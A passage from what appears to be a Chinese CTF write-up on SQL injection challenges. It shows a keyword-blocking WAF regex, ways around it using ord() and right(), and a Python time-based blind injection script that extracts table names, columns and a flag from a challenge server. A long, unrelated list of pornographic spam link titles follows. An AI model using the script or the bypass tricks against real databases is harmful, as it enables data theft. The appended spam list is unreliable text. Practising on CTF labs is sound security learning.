//屏蔽危險分子function waf($str){return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str); }

ascii可以用ord同名函數替換,substr可以用right替換

從右邊開始截取,配合ascii使用. ascii('str')返回字符串的第一個字符的ascii碼 ascii(right('abc',2))= 97 | ascii('bc')

其實也可以直接用=,就不用比較了,就是懶得重新寫

# @Author:Kradress from time import sleep import requestsurl = "http://d9c4aa97-33ea-4164-abc7-79b0c50fe9ce.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcac'" #爆字段值 payload = "select flagaabcc from ctfshow_flagxcac"for i in range(9,50):head = 32tail = 127while head < tail:sleep(1)mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'ip' : f"-1) or if(ord(right(({payload}),{i}))>{mid},(select count(*) from information_schema.columns A, information_schema.columns B,information_schema.schemata C),1",'debug' : '1'}try:r = requests.post(url, data, timeout=1)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

總結

上篇終于告一段落了,最近在學java漏洞審計和內網,所以更新的有點慢(拖了2個月了),接下來馬上把下篇也補上.

總結

以上是生活随笔為你收集整理的CTFshow sql注入 上篇(web171-220)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

在线观看视频在线 | 午夜成人免费电影 | 欧美成人中文字幕 | 亚洲精品资源在线观看 | 99国产在线视频 | 久久久久久久久久久黄色 | 欧美综合在线观看 | 久久久91精品国产一区二区精品 | 香蕉久草 | 色丁香色婷婷 | 国产首页| 五月婷婷毛片 | 91亚洲国产| 97视频网站 | 亚洲综合色网站 | 免费黄色特级片 | 狠狠干夜夜爽 | 狠狠狠狠狠色综合 | 精品亚洲在线 | 成人免费网站在线观看 | 国产精品久久久久久久毛片 | 中文字幕亚洲精品日韩 | 国产精品美女久久久免费 | 欧美精品免费视频 | 丁香六月婷婷开心婷婷网 | www.色五月.com | 在线观看精品国产 | 亚洲精品在线观看的 | 免费看三级网站 | av在线免费观看网站 | 久久免费国产精品 | 国产99在线播放 | 国产精品视频资源 | 亚洲精品456在线播放第一页 | 欧美视频18 | 久草精品在线播放 | 中文字幕av免费在线观看 | 中日韩在线视频 | 十八岁免进欧美 | 国产在线精品一区二区三区 | 久久婷婷一区二区三区 | 成人午夜精品福利免费 | 韩国一区视频 | 91精品免费 | 日韩视频一区二区三区 | 日韩伦理一区二区三区av在线 | www.五月天婷婷 | 亚洲国内精品在线 | 亚洲三级在线播放 | 97操碰| 丁香婷婷深情五月亚洲 | 国产在线观看av | 精品在线视频一区 | 日韩理论片 | 亚洲精品国产精品国自产在线 | 久久婷五月 | 国产亚洲精品久久久久久无几年桃 | 天堂av官网| 久久国产视频网站 | 日韩区欠美精品av视频 | 久久免费国产 | a午夜在线 | 国产在线探花 | 久久观看最新视频 | 久草视频在线资源 | 久久久午夜剧场 | 久久久久久久久久久影视 | 在线观看911视频 | 精品久久久久久亚洲综合网站 | 国产亚洲精品久久久久秋 | 久久这里 | 久久久蜜桃一区二区 | 日日麻批40分钟视频免费观看 | 国产成人久久av免费高清密臂 | 色偷偷888欧美精品久久久 | 成人在线一区二区三区 | 中文字幕在线观看你懂的 | 欧美激情视频免费看 | 婷婷成人综合 | 色婷婷精品大在线视频 | 国产五码一区 | 久久免费在线观看视频 | 国产精品人成电影在线观看 | 国产999久久久| 成年人黄色免费网站 | 91亚洲夫妻 | 欧美99热 | 9999在线 | 亚洲精品一区二区三区新线路 | 日韩在线资源 | 久久国产网 | 午夜精品久久久久久久99水蜜桃 | wwwwwww色 | 国产91精品久久久久 | 久久久国产影院 | 六月天综合网 | 日韩在线视频在线观看 | 97夜夜澡人人双人人人喊 | 日韩精品免费一区 | 97国产大学生情侣酒店的特点 | 亚洲精品乱码久久久久 | 国产免费三级在线观看 | 麻豆影视网站 | 国产亚洲精品精品精品 | 国产九九九精品视频 | 成人影音在线 | 中文字幕亚洲高清 | 麻豆一级视频 | 国产精品麻豆一区二区三区 | 国产一区视频在线播放 | 天天操狠狠操网站 | 九九久久久久久久久激情 | 人人舔人人干 | 五月婷在线视频 | 国产日韩在线播放 | 久久久麻豆视频 | 婷婷天天色 | 国产精品免费大片视频 | 中文字幕日韩高清 | 色wwww| 日韩精品视频在线观看网址 | 国产又粗又硬又爽的视频 | 永久免费的av电影 | 欧美人体xx | 亚洲精品乱码久久久久久9色 | 免费一级片久久 | 精品国产一区二区三区噜噜噜 | 中文字幕色在线 | 91在线视频在线 | 日韩免费播放 | 2019中文 | 人人插人人玩 | 日韩在线观看视频免费 | 黄色视屏在线免费观看 | 激情五月婷婷丁香 | 人人看人人 | 欧美精品久久久久久久久老牛影院 | 超级碰碰碰免费视频 | 午夜a区| 免费在线观看一级片 | 精品一区二区在线免费观看 | 特级毛片在线 | 91精品视频在线播放 | 欧美aa在线| 日韩在线看片 | 中文字幕资源在线观看 | 久久99国产精品久久99 | 色五月激情五月 | 久久伦理网 | 亚洲少妇激情 | 中文字幕一区二区在线观看 | 欧美专区亚洲专区 | 夜夜躁天天躁很躁波 | 激情网站| 亚洲专区在线播放 | 亚洲一区黄色 | 亚洲精品视频在线播放 | 日韩久久久久 | 国产成人无码AⅤ片在线观 日韩av不卡在线 | 中文字幕在线观看免费观看 | 日韩av一区在线观看 | 91久久久久久久一区二区 | 亚洲日韩中文字幕在线播放 | 久操97 | 国产精品久久久久久久久久免费看 | 久久av网址 | 成人黄色中文字幕 | 欧美极品少妇xxxxⅹ欧美极品少妇xxxx亚洲精品 | 久久这里只有精品1 | 日本精品一区二区 | 欧美日韩国产在线一区 | 日韩精品免费专区 | 伊人开心激情 | 综合网久久 | 在线免费观看国产视频 | 在线观看福利网站 | 一级成人在线 | 免费视频成人 | 综合精品久久 | 国产高清福利在线 | 日韩免费在线观看 | 久久激情视频免费观看 | 女人18精品一区二区三区 | av天天在线观看 | 久草在线视频首页 | 草久在线观看视频 | 日本不卡一区二区三区在线观看 | 日韩精品一区二区三区水蜜桃 | 在线 日韩 av | 人人爽人人爽人人爽人人爽 | 99人久久精品视频最新地址 | 精品一区 在线 | 国产视频中文字幕 | 免费精品视频 | 久草在线视频在线观看 | 国产香蕉97碰碰碰视频在线观看 | 久久激情五月丁香伊人 | 91在线区| 深夜国产福利 | 东方av在线免费观看 | 免费a现在观看 | 中文字幕在线第一页 | 依人成人综合网 | 97色噜噜 | 日日干激情五月 | 国产精品女人网站 | 97精品国产91久久久久久久 | 精品久久久久久久久久国产 | 全黄网站 | 免费看搞黄视频网站 | 国产精品18毛片一区二区 | 国产区第一页 | 色视频网站免费观看 | 国产黄色在线网站 | 久久久免费看片 | 日韩在线视频网 | 欧美日韩一区二区视频在线观看 | 国产男女无遮挡猛进猛出在线观看 | 91精品国产综合久久福利不卡 | 涩涩网站在线播放 | 91av官网 | 色姑娘综合天天 | 超碰在线1| 日韩国产精品一区 | 亚洲国产精品第一区二区 | 欧美精品中文在线免费观看 | 久久综合免费 | 久久久久亚洲精品成人网小说 | av专区在线 | 免费又黄又爽视频 | 免费网址你懂的 | www.在线观看视频 | 免费在线观看日韩视频 | 视频一区视频二区在线观看 | 99久久99视频只有精品 | 国产手机免费视频 | 国产成人一区二区三区免费看 | 国产区精品在线 | 成 人 黄 色视频免费播放 | 午夜12点 | 国产精品一区二区三区免费看 | 国产精品伦一区二区三区视频 | 国产精品丝袜久久久久久久不卡 | 在线色亚洲 | www国产在线 | 蜜桃视频成人在线观看 | 日本精品二区 | 国产又黄又爽又猛视频日本 | 97国产| 五月激情视频 | 在线观看国产成人av片 | 亚洲综合视频在线观看 | 69xxxx欧美 | 中文字幕亚洲字幕 | av黄色成人 | 成人精品一区二区三区电影免费 | 精品女同一区二区三区在线观看 | 国产免费亚洲 | 日韩久久影院 | 欧美日韩三区二区 | 国产99久久久国产精品免费看 | 日韩欧美xxx | 中文字幕网址 | 亚洲色综合| 国产在线精品国自产拍影院 | 久久精品国产亚洲精品2020 | 婷婷亚洲综合 | 69xx视频 | 人人爽人人爱 | 精品国产免费av | 夜夜躁天天躁很躁波 | 国产日韩欧美精品在线观看 | 日韩精品一区二区三区水蜜桃 | 97涩涩视频 | 天天躁天天操 | 久久精品综合视频 | 天天综合视频在线观看 | 欧美激情xxxx性bbbb | 日韩免费成人 | 欧美日韩国产高清视频 | 九九热国产视频 | 亚洲黄色一级电影 | 国产麻豆果冻传媒在线观看 | 亚洲伊人婷婷 | 黄色成人av | 99在线观看视频网站 | 狠狠干婷婷色 | 亚洲另类视频在线观看 | 成人黄色片免费 | 国产香蕉97碰碰碰视频在线观看 | 成人 国产 在线 | 亚洲成人av片在线观看 | 国产一区二区在线观看视频 | av中文字幕网址 | 午夜影视一区 | 99精品国产免费久久久久久下载 | 在线观看自拍 | 成人a视频片观看免费 | 亚洲精品在线观看视频 | 欧美日韩在线免费观看视频 | 亚洲另类xxxx| 岛国av在线免费 | 色是在线视频 | 在线看成人 | 韩日三级在线 | 91精品一区二区三区蜜臀 | 日本久久久久久科技有限公司 | 91精品在线免费 | 免费观看www视频 | 天天综合成人网 | 国产又粗又长的视频 | 在线观看日韩av | 国产精品一区二区三区久久 | 日韩欧美电影网 | 韩国一区二区三区视频 | 啪啪肉肉污av国网站 | 亚洲黄色免费在线 | 国产a级片免费观看 | 亚洲一区二区高潮无套美女 | 久久久96| 91丨九色丨蝌蚪丰满 | 亚洲综合欧美激情 | 精品国产亚洲日本 | 在线视频国产区 | 九九免费在线观看 | 亚洲成人xxx | 国产精品麻豆三级一区视频 | 综合久久久久 | 中文字幕成人在线 | 久久人人爽人人爽 | 亚洲国产日韩一区 | 欧美日韩xxx | 亚洲欧美日韩一二三区 | 国产一卡在线 | 国产综合视频在线观看 | 操高跟美女| 在线va视频 | 免费三级网 | 久久午夜精品影院一区 | 麻豆视频免费入口 | 狠狠的操你 | 午夜视频一区二区三区 | 视频在线播放国产 | 欧美亚洲国产一卡 | 国产69久久久欧美一级 | 久草在线免费资源 | 黄色91免费观看 | 中文字幕刺激在线 | .精品久久久麻豆国产精品 亚洲va欧美 | 久久精品国产99国产 | 亚洲高清精品在线 | 婷婷久月 | 国产精品mm| 国产日本三级 | 国产一级二级视频 | 一区二区三区四区免费视频 | 天天草天天草 | 又黄又爽又刺激的视频 | 欧美做受高潮1 | 国产96精品 | 亚洲欧洲xxxx | 欧美一级裸体视频 | 国产亚洲精品久久久久久久久久久久 | 天天色天天爱天天射综合 | 免费看黄视频 | 丁香六月国产 | 亚洲不卡123| 国产精品成人一区二区三区吃奶 | 成年人网站免费在线观看 | av官网| 国产黄网站在线观看 | 日本最新一区二区三区 | 中文字幕乱码亚洲精品一区 | 蜜臀aⅴ精品一区二区三区 久久视屏网 | 国产日韩精品欧美 | 久久99精品久久久久久清纯直播 | 天天草天天爽 | 国产男女免费完整视频 | 日韩理论片在线观看 | 欧美精品午夜 | 91精品无人成人www | 色偷偷97 | 亚洲成人高清在线 | 九九欧美 | 99一级片| 国产精品久久99 | 中文av网 | 又紧又大又爽精品一区二区 | 欧美激情视频一二区 | 99精品网站| 永久免费观看视频 | 亚洲日本韩国一区二区 | 日韩免费av片 | 日韩在线精品一区 | 粉嫩av一区二区三区免费 | 黄色毛片在线 | 成人欧美一区二区三区黑人麻豆 | 久久99国产综合精品免费 | 精品久久久久久一区二区里番 | 在线观看视频黄 | 日本女人的性生活视频 | 日韩欧美一区二区三区免费观看 | 97综合在线| 成人观看视频 | 精品视频国产 | 中文字幕一区二区三区精华液 | 国产精彩视频一区 | 超碰在线观看av | 色狠狠干 | 国产精品第72页 | 国产一级片播放 | 亚洲精品国产精品国自产 | 国产高清在线 | 91久草视频 | 国产在线播放不卡 | www.黄色网.com | 中文字幕日韩精品有码视频 | 天天操夜夜操 | 99久久99| 国产破处精品 | 免费日韩精品 | 国产又粗又猛又爽 | 国产在线观看高清视频 | 国产精品igao视频网网址 | 美女免费黄网站 | 91精品国产乱码 | 在线视频电影 | 日韩电影一区二区在线 | 日本久久成人 | 国产精品美女免费视频 | 91av视频在线观看免费 | 国产在线国偷精品产拍免费yy | 亚洲综合在线一区二区三区 | 国产视频999 | 国产成人久久精品77777综合 | 天天爱天天射天天干天天 | 国产小视频你懂的在线 | 久久一区国产 | 中文综合在线 | 久久久麻豆视频 | 亚洲 成人 一区 | 精品一区二区av | 国产片免费在线观看视频 | 91精品成人 | 国产精品一区二区久久国产 | 91在线视频观看 | 99久久激情视频 | 日本三级在线观看中文字 | 九九电影在线 | 国产精品自产拍在线观看 | 欧美日韩国产一区二区三区在线观看 | 草 免费视频| 999视频在线播放 | av电影在线观看完整版一区二区 | 国产精品美女免费看 | 国产精品一区二区久久久久 | 日本视频久久久 | 国产综合视频在线观看 | 婷婷日| 成人91在线 | 在线观看免费福利 | 色av男人的天堂免费在线 | 色婷婷在线视频 | 91九色性视频 | 久久久免费看片 | 丁香电影小说免费视频观看 | 992tv又爽又黄的免费视频 | 亚洲精品影视 | 久久系列| 日韩精品在线看 | 精品美女久久 | 久久久精品综合 | 国产成年人av | 国产999| 国产午夜激情视频 | 亚洲精品午夜久久久 | 久久草 | 在线精品视频在线观看高清 | 九九热中文字幕 | 久久久久久国产精品免费 | 曰韩精品 | 精品国产一区二区三区久久久蜜月 | 一区二区三区四区五区在线 | 国产乱对白刺激视频在线观看女王 | 91精品国产乱码久久 | 亚洲成人资源网 | 欧洲色吧 | 国产在线美女 | 正在播放 国产精品 | 狠狠色丁香婷婷综合最新地址 | 在线观看国产日韩 | 日韩免费视频网站 | 91一区啪爱嗯打偷拍欧美 | 亚洲电影第一页av | 日韩成人免费电影 | 国产在线a不卡 | 国产 亚洲 欧美 在线 | 免费看一级片 | 欧美日韩国产亚洲乱码字幕 | 色中文字幕在线观看 | 99精品欧美一区二区三区黑人哦 | 99精品一区二区三区 | 国产黄色精品在线 | 91视频免费看片 | 91精品少妇偷拍99 | 国产91对白在线播 | 免费三级黄色片 | 91在线一区| 成年人电影免费在线观看 | 玖玖爱免费视频 | 亚州天堂 | 日韩精品大片 | 日本黄色黄网站 | 天天操夜夜操国产精品 | av在线网站大全 | 亚洲久草在线视频 | 国产欧美在线一区二区三区 | 久久在草 | 在线免费观看黄色 | 香蕉影视在线观看 | 福利一区在线 | 国产永久免费观看 | 在线成人av | 国产精品成人一区二区三区 | 国产视频亚洲 | 成人久久视频 | 国产精品美女久久久免费 | 国产精品a级 | 亚洲成人午夜av | 国产 在线 高清 精品 | 久久伊人操| 亚洲精品99久久久久久 | 国产午夜视频在线观看 | 国产69熟 | se婷婷 | 91精品久久久久久综合乱菊 | 久久er99热精品一区二区 | 国产一区二区三区四区在线 | 亚洲精品免费看 | 天天射天天干天天插 | 国产看片免费 | 精品久久久久久久久久 | 中文在线 | 中文字幕色站 | 亚洲一级黄色大片 | 日韩精品视频久久 | 国产亚洲精品久久19p | 一区二区三区日韩在线 | 国产aa精品 | 99在线观看视频网站 | 成人网在线免费视频 | 在线观看精品一区 | 精品爱爱 | 人人搞人人干 | 精品国产一区二区三区久久久 | 国产精品1区2区3区在线观看 | 91在线永久| 亚洲精品欧美专区 | 欧美福利视频 | 久章草在线 | 日韩videos | 日韩欧美精品在线视频 | 国产黄色精品视频 | 久草在线综合 | 在线免费国产 | 国产自产在线视频 | 亚洲视频 中文字幕 | 国产精品丝袜久久久久久久不卡 | 成人久久18免费网站图片 | 青青河边草免费观看 | 国产免费专区 | 欧美肥妇free | 91成人网在线播放 | 日韩欧美在线高清 | 麻豆免费观看视频 | 亚洲精品 在线视频 | 亚洲精品国产综合99久久夜夜嗨 | 日韩一二区在线观看 | 久久综合狠狠综合久久狠狠色综合 | 九色在线视频 | 国产91精品看黄网站在线观看动漫 | 欧美在线视频不卡 | 成人app在线播放 | 四虎影视成人永久免费观看亚洲欧美 | www91在线观看 | 超碰97中文| 亚洲另类视频在线观看 | 国产精品片| 久久精品99国产精品日本 | 久久精品专区 | 久久久久久久久免费 | 日韩精品中文字幕在线不卡尤物 | 国产成人av综合色 | 91大神在线观看视频 | 二区视频在线观看 | 国产91精品看黄网站在线观看动漫 | 不卡的av在线播放 | 337p日本欧洲亚洲大胆裸体艺术 | 毛片一二区 | 美女性爽视频国产免费app | 97超碰在线久草超碰在线观看 | 国产日产高清dvd碟片 | 91精品一区国产高清在线gif | 国产精品久久中文字幕 | a久久免费视频 | 成人观看| 成人免费在线观看av | 天天av在线播放 | 一区二区三区免费在线观看视频 | 二区中文字幕 | 网址你懂的在线观看 | 81精品国产乱码久久久久久 | 手机看片中文字幕 | 久久久www成人免费精品 | 91传媒在线观看 | 国产亚洲免费的视频看 | 国产欧美精品一区二区三区四区 | 亚洲在线网址 | 久久人人爽人人爽人人片av软件 | 免费在线观看av | 成人久久久久久久久久 | 日韩在线观看你懂的 | 成人免费在线播放 | 97香蕉久久超级碰碰高清版 | 久久激情影院 | 在线免费中文字幕 | 毛片视频电影 | 国产精品一区久久久久 | 91亚洲精品久久久蜜桃网站 | 色综合天天做天天爱 | 免费看精品久久片 | 久久久久区 | 久久国产精品99久久人人澡 | 在线免费观看的av | 在线免费观看的av | 欧美福利在线播放 | 久久久国产精品一区二区三区 | 一级黄色av| 久草网在线观看 | 丰满少妇在线观看网站 | 国产精品久久久久久久午夜 | 国产精品一区免费看8c0m | 国产日韩精品欧美 | 亚洲精品在线免费播放 | 成人av片免费观看app下载 | 久久视频免费在线 | 丁香婷婷激情国产高清秒播 | 久久国产精品免费 | 日韩免费电影一区二区三区 | 免费 在线 中文 日本 | 成人福利在线 | 天堂成人在线 | www.狠狠操.com | 97免费视频在线 | 97视频免费播放 | 欧美一级免费在线 | 四虎国产精品永久在线国在线 | 中文字幕高清免费日韩视频在线 | 一级片色播影院 | 欧美极品少妇xbxb性爽爽视频 | 狠狠干狠狠插 | 色综合久久久 | 亚洲欧洲精品在线 | 黄色小说免费观看 | 国产精品免费人成网站 | 精品日韩在线 | 国产精品久久麻豆 | 亚洲成人精品影院 | 成人网在线免费视频 | 国产成人久久精品一区二区三区 | 久久超碰97 | 三级av免费看 | 视频 天天草| 麻豆91精品91久久久 | 欧美精品小视频 | 亚洲精品久久久久中文字幕m男 | 亚洲国产午夜视频 | 欧美精品久久久久久久久免 | 9幺看片 | 97香蕉久久国产在线观看 | 日本久草电影 | 在线免费av电影 | 国产 欧美 在线 | 久99视频| 亚洲精品动漫成人3d无尽在线 | 国产精品久久久久三级 | 日韩性片 | 亚洲精品国产拍在线 | 香蕉久久久久久av成人 | 国产精品剧情在线亚洲 | 国产精品免费人成网站 | 国产一级片网站 | 香蕉久久国产 | 99综合电影在线视频 | 亚洲国产中文在线观看 | 免费91麻豆精品国产自产在线观看 | 亚州精品天堂中文字幕 | 超碰九九 | 91在线看黄 | 五月婷社区 | 99精品视频一区 | 91久久精品一区二区二区 | 超碰97成人 | 国产精品久久久久久久久久久久午夜 | 久久香蕉一区 | 国产精品国产三级国产 | 亚洲高清视频在线观看 | 欧美一区成人 | 天天搞夜夜骑 | 一区二区不卡视频在线观看 | 在线观看国产91 | 福利一区二区三区四区 | 欧美福利久久 | 亚洲第一区在线观看 | 激情狠狠干 | 91人人网| 日本久久精品视频 | 国产麻豆精品久久一二三 | 欧美日韩视频精品 | 99视频在线观看视频 | 色在线视频 | 99草视频在线观看 | 久久精品中文字幕 | 精品国产一区二区三区久久 | 亚洲 欧美 另类人妖 | 伊人成人激情 | 国产特级毛片aaaaaa高清 | 在线播放一区二区三区 | 日韩欧美一级二级 | 色婷婷骚婷婷 | 精品国产伦一区二区三区观看体验 | 日批在线看 | 成人在线观看av | 国产一区二区三区网站 | av黄色成人 | 最新免费av在线 | 日韩一区视频在线 | 久久久精品高清 | 一级黄色在线免费观看 | 久久久久久久久网站 | 91大神精品视频在线观看 | 国内精品久久久久影院一蜜桃 | 国产视频精品久久 | 亚洲精品999 | 亚洲国产中文字幕在线观看 | 91日韩精品一区 | 在线视频久 | 天天看天天干天天操 | 婷婷在线网 | 99福利影院 | 久久免费观看视频 | 狠狠的日 | 久久久精品亚洲 | 免费观看一级一片 | 久久久不卡影院 | 久久好看免费视频 | 91传媒免费观看 | 国产精品久久久网站 | 久久国产精品99久久久久久丝袜 | 香蕉免费 | 日韩av一区二区三区四区 | 在线观看国产一区 | 97视频在线免费观看 | 日韩精品视频在线观看网址 | 成人a在线观看 | 福利视频一区二区 | 婷婷国产视频 | 91麻豆福利 | 色在线国产| 伊人热| 国产热re99久久6国产精品 | 91亚洲精品乱码久久久久久蜜桃 | 欧美五月婷婷 | 在线看成人 | 成人小视频在线 | 91 在线视频 | 国产精品久久久久9999 | 亚洲在线 | 久久激情综合网 | 欧美性色xo影院 | 看片的网址 | 中文字幕第| x99av成人免费 | 日韩91av | 天天激情站 | 欧洲精品视频一区 | 五月天婷婷在线观看视频 | 丁香六月五月婷婷 | 美女黄频网站 | 91片黄在线观 | 日韩网站中文字幕 | www.狠狠| 亚洲男男gaygay无套同网址 | 在线观看av不卡 | 久久视频国产精品免费视频在线 | 成在人线av| 精品色999 | av网站在线免费观看 | 久久日本视频 | 国产亚洲综合性久久久影院 | 国产永久免费高清在线观看视频 | 日韩网站视频 | 九七人人干 | 在线观看一级片 | 91私密保健| 91麻豆免费视频 | 激情av综合 | 男女全黄一级一级高潮免费看 | 婷婷丁香在线 | 91香蕉视频色版 | 久久久久亚洲国产精品 | www.狠狠色 | 中文字幕一区二区三区四区在线视频 | 激情婷婷在线 | 久久免费高清视频 | 日韩动漫免费观看高清完整版在线观看 | 18女毛片 | 亚洲国产精品999 | 91丨九色丨勾搭 | 嫩嫩影院理论片 | 中文字幕 国产视频 | 韩国精品一区二区三区六区色诱 | 91亚洲国产成人久久精品网站 | 天天操天天射天天插 | 在线观看成人网 | 韩国在线视频一区 | 少妇精69xxtheporn| 成人av av在线 | 日韩在线理论 | 91在线精品观看 | 美国人与动物xxxx | 国产成人黄色片 | 日本精品xxxx | 国产男女爽爽爽免费视频 | 夜夜狠狠 | 国产xx视频 | 又爽又黄在线观看 | 性色va | 色婷婷av国产精品 | 永久免费的啪啪网站免费观看浪潮 | 中文字幕在线播放一区二区 | 欧美日高清视频 | 综合久久综合久久 | 亚洲成人资源在线观看 | 伊人天天干 | 国产成人三级在线观看 | 国产精品免费久久久久久久久久中文 | 日韩v在线91成人自拍 | 久久久高清免费视频 | 麻花豆传媒一二三产区 | 精品嫩模福利一区二区蜜臀 | www五月| 久久国产免费看 | 亚洲精品在线播放视频 | 天天综合视频在线观看 | 国语久久 | 日韩有码第一页 | 国产精品久久久久久久久岛 | 久久久精品久久日韩一区综合 | 在线v片免费观看视频 | 欧美日韩国产在线观看 | 91视频91色| 91成年人在线观看 | 亚洲精品网站 | 一区 二区电影免费在线观看 | 狠狠躁日日躁 | 欧美一区二区三区激情视频 | 午夜美女福利直播 | 日本黄色免费观看 | 午夜私人影院久久久久 | 美女视频黄频大全免费 | 国产精品中文字幕在线观看 | 一级免费黄视频 | 天堂网中文在线 | 国产精品中文字幕av | 精品久久久久一区二区国产 | 最近高清中文字幕 | 在线亚洲精品 | 五月天久久婷 | 偷拍精品一区二区三区 | 少妇bbbb搡bbbb桶 | 国产视频1区2区3区 久久夜视频 | 色综合小说 | 国产成人一区在线 | 四虎永久免费 | 免费成人短视频 | 中文字幕在线观看第一页 | 久草视频看看 | 国产无遮挡又黄又爽在线观看 | 久久亚洲福利 | av网站播放 | 午夜天天操 | 亚洲草视频| 五月亚洲 | 麻豆精品视频在线观看免费 | 久久成人人人人精品欧 | 99久久成人| 久久99免费视频 | 在线日韩一区 | 91麻豆精品一区二区三区 | 毛片随便看 | 看片网站黄色 | 五月天婷婷免费视频 | 97精品国自产拍在线观看 | 中文字幕二区在线观看 | 欧美成人高清 | 成人精品视频久久久久 | 久久国产精品99久久久久 | 欧美色噜噜 | 成人免费视频网 | 国产精品一区二区av | av在线免费在线 | 日一日操一操 | 久久久蜜桃一区二区 | 九九免费在线视频 | 欧美另类老妇 | av日韩av| 国产精品一区二区三区视频免费 | 伊香蕉大综综综合久久啪 | 日韩欧美xxxx | 国产理伦在线 | 日韩免费看的电影 | 精品久久久久久久久亚洲 | 国产成人黄色av | 国产精品av免费 | 中文在线a√在线 | 高清不卡一区二区在线 | 黄色成人免费电影 | 日韩三区在线观看 | 日韩av在线网站 | 亚洲欧美少妇 | 国产成人一级电影 | 三级黄色网址 | 99久e精品热线免费 99国产精品久久久久久久久久 | 天天干天天干天天 | 一区免费观看 | 久久精品国产美女 | 黄色最新网址 | 亚洲色图22p| 91在线视频免费播放 | 精品久久久久久亚洲 | 97在线观看视频 | 亚洲精品乱码久久久久久蜜桃动漫 | 日本大尺码专区mv | 日韩中文字幕免费视频 | 久久久久亚洲精品国产 | 久草在线资源免费 | 精品国内自产拍在线观看视频 | 精品一区二区三区久久 | 久久网站免费 | 国产欧美日韩精品一区二区免费 | 国产免费xvideos视频入口 | 亚洲国产精品久久久久久 | 精品国产三级a∨在线欧美 免费一级片在线观看 | 久久精品福利 | 欧美精品乱码99久久影院 | 久久不射电影网 | 在线观看成人福利 | 国产美女视频免费观看的网站 | 久久夜色精品国产欧美一区麻豆 | 亚洲一级二级三级 | 久久久国产99久久国产一 | 天天插夜夜操 | 99tvdz@gmail.com| 在线精品视频免费观看 | 中文字幕在 | 一区中文字幕电影 | 成人av片在线观看 | 最新成人av | 国产精品免费视频久久久 | 免费网站色 | 怡红院av久久久久久久 | 欧美性大战久久久久 | 热久精品 | 一区二区视频免费在线观看 | 亚洲一区免费在线 | 97福利| 91大神在线观看视频 | 久久精品三级 | 国产精品久久久久永久免费 | 亚洲综合最新在线 | 国产丝袜美腿在线 | 日韩在线免费播放 | 一区中文字幕在线观看 | 在线免费中文字幕 | 六月婷婷色 | 久久久www成人免费精品 | 国产 日韩 欧美 中文 在线播放 | 在线国产能看的 | 日韩免费视频播放 | 九九综合久久 | av免费在线播放 | 99精品视频在线观看播放 | 久久国产亚洲视频 | 国产精品门事件 | 久久久久www| 久久香蕉影视 | 美女黄频网站 |